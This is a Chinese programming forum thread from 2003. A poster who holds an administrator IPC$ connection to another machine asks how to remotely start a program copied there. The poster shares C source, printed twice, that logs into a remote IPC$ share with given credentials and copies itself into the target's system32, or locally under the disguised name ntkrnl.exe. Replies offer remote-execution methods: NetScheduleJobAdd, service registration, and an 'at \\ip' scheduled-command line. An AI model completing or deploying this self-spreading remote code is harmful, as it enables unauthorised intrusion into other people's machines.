18,355
社区成员
发帖
与我相关
我的任务
分享高手指点:已经同对方取得管理员的IPC连接,并把程序拷到对方的系统目录下,请问这时如何启动此程序(控制台,带参数)
高手指点:已经同对方取得管理员的IPC$连接,并把程序拷到对方的系统目录下,请问这时如何启动此程序(控制台,带参数)
...全文
请发表友善的回复…
发表回复
wzswgbx 2003-08-21
- 打赏
- 举报
帖源码,在???????处希高手指点,欢迎访问站点www.fz5fz.org
#include <windows.h>
#include <stdio.h>
#include <Winnetwk.h>
#pragma comment(lib,"Mpr.lib")
#define BUFFER_SIZE 1024
void CopytoHost(char *lpHost)
{
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
char *lpHostName;
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
if(lpHost==NULL)//未指定机名或IP地址
{
GetSystemDirectory(lpImagePath,MAX_PATH);//获取系统路径
strcat(lpImagePath,"\\ntkrnl.exe");
lpHostName=NULL;
}
else
{
sprintf(lpImagePath,"\\\\%s\\Admin$\\system32\\aaa.exe",lpHost);
lpHostName=(char *)malloc(256);
sprintf(lpHostName,"\\\\%s",lpHost);
}
printf("Transmitting File ... ");
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==5)
{
printf("Failure ... Access is Denied !\n");
}
else
{
printf("Failure !\n");
}
return ;
}
else
{
printf("Success !\n");
}
}
else
{
printf("already Exists !\n");
FindClose(hSearch);
}
}
//以某一用户名和密码连接对方的IPC:bConnect==TURE时连接;FALSE时断开连接lpHost为对方IP或机名
BOOL ConnectRemote(BOOL bConnect,char *lpHost,char *lpUserName,char *lpPassword)
{
char lpIPC[256];
DWORD dwErrorCode;
NETRESOURCE NetResource;
sprintf(lpIPC,"\\\\%s\\ipc$",lpHost);
NetResource.lpLocalName = NULL;
NetResource.lpRemoteName = lpIPC;
NetResource.dwType = RESOURCETYPE_ANY;
NetResource.lpProvider = NULL;
if(!stricmp(lpPassword,"NULL"))
{
lpPassword=NULL;
}
if(bConnect)
{
printf("Now Connecting ...... ");
while(1)
{
dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE);
if((dwErrorCode==ERROR_ALREADY_ASSIGNED) || (dwErrorCode==ERROR_DEVICE_ALREADY_REMEMBERED))
{
WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
}
else if(dwErrorCode==NO_ERROR)
{
printf("Success !\n");
break;
}
else
{
printf("Failure !\n");
return FALSE;
}
Sleep(10);
}
}
else
{
printf("Now Disconnecting ... ");
dwErrorCode=WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
if(dwErrorCode==NO_ERROR)
{
printf("Success !\n");
}
else
{
printf("Failure !\n");
return FALSE;
}
}
return TRUE;
}
int main(int argc,char *argv[])
{
if(argc==2&&stricmp(argv[1],"y")==0)
{
printf("run!\n");
return 0;
}
if(argc==5)
{
if(ConnectRemote(TRUE,argv[2],argv[3],argv[4])==FALSE)
{
printf("can not connect %s!\n",argv[2]);
return -1;
}
CopytoHost(argv[2]);
//?????????????????????????????????????在这里我要让对方启动我刚传过去的本程序并给其命令行参数 y
return 0;
}
return 0;
}
#include <windows.h>
#include <stdio.h>
#include <Winnetwk.h>
#pragma comment(lib,"Mpr.lib")
#define BUFFER_SIZE 1024
void CopytoHost(char *lpHost)
{
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
char *lpHostName;
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
if(lpHost==NULL)//未指定机名或IP地址
{
GetSystemDirectory(lpImagePath,MAX_PATH);//获取系统路径
strcat(lpImagePath,"\\ntkrnl.exe");
lpHostName=NULL;
}
else
{
sprintf(lpImagePath,"\\\\%s\\Admin$\\system32\\aaa.exe",lpHost);
lpHostName=(char *)malloc(256);
sprintf(lpHostName,"\\\\%s",lpHost);
}
printf("Transmitting File ... ");
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==5)
{
printf("Failure ... Access is Denied !\n");
}
else
{
printf("Failure !\n");
}
return ;
}
else
{
printf("Success !\n");
}
}
else
{
printf("already Exists !\n");
FindClose(hSearch);
}
}
//以某一用户名和密码连接对方的IPC:bConnect==TURE时连接;FALSE时断开连接lpHost为对方IP或机名
BOOL ConnectRemote(BOOL bConnect,char *lpHost,char *lpUserName,char *lpPassword)
{
char lpIPC[256];
DWORD dwErrorCode;
NETRESOURCE NetResource;
sprintf(lpIPC,"\\\\%s\\ipc$",lpHost);
NetResource.lpLocalName = NULL;
NetResource.lpRemoteName = lpIPC;
NetResource.dwType = RESOURCETYPE_ANY;
NetResource.lpProvider = NULL;
if(!stricmp(lpPassword,"NULL"))
{
lpPassword=NULL;
}
if(bConnect)
{
printf("Now Connecting ...... ");
while(1)
{
dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE);
if((dwErrorCode==ERROR_ALREADY_ASSIGNED) || (dwErrorCode==ERROR_DEVICE_ALREADY_REMEMBERED))
{
WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
}
else if(dwErrorCode==NO_ERROR)
{
printf("Success !\n");
break;
}
else
{
printf("Failure !\n");
return FALSE;
}
Sleep(10);
}
}
else
{
printf("Now Disconnecting ... ");
dwErrorCode=WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
if(dwErrorCode==NO_ERROR)
{
printf("Success !\n");
}
else
{
printf("Failure !\n");
return FALSE;
}
}
return TRUE;
}
int main(int argc,char *argv[])
{
if(argc==2&&stricmp(argv[1],"y")==0)
{
printf("run!\n");
return 0;
}
if(argc==5)
{
if(ConnectRemote(TRUE,argv[2],argv[3],argv[4])==FALSE)
{
printf("can not connect %s!\n",argv[2]);
return -1;
}
CopytoHost(argv[2]);
//?????????????????????????????????????在这里我要让对方启动我刚传过去的本程序并给其命令行参数 y
return 0;
}
return 0;
}
wzswgbx 2003-08-21
- 打赏
- 举报
问了T0o2y,建议我调用netapi32.dll中的NetScheduleJobAdd函数,有没有人用过这个函数的,MSDN丢了,这个函数的运行环境等无法查,哪位高手用过???
wzswgbx 2003-08-21
- 打赏
- 举报
要编程即刻实现,不用AT命令
chchch 2003-08-21
- 打赏
- 举报
你可以把你的程序做成后台服务,然后在另一台机器可以通过程序注册到服务管理器,然后在通过程序启动.不过这样要求对方是NT体系的,包括2000和XP.
98下你也可以注册为后台进程,然后启动进程.
98下你也可以注册为后台进程,然后启动进程.
pushser 2003-08-21
- 打赏
- 举报
at \\ip 18:35 C:\winnt\system32\cmd.exe
wzswgbx 2003-08-21
- 打赏
- 举报
大哥,你这是在自己的机上运行啊
xiaoxx 2003-08-21
- 打赏
- 举报
SHELLEXECUTEINFO sei;
ZeroMemory(&sei,sizeof(sei));
sei.cbSize = sizeof(sei);
sei.nShow = SW_SHOW;
sei.hwnd = GetDesktopWindow();
//设置sei的lpParameters属性为你要执行的文件
bool bSuccess = ShellExecuteEx(&sei);
ZeroMemory(&sei,sizeof(sei));
sei.cbSize = sizeof(sei);
sei.nShow = SW_SHOW;
sei.hwnd = GetDesktopWindow();
//设置sei的lpParameters属性为你要执行的文件
bool bSuccess = ShellExecuteEx(&sei);
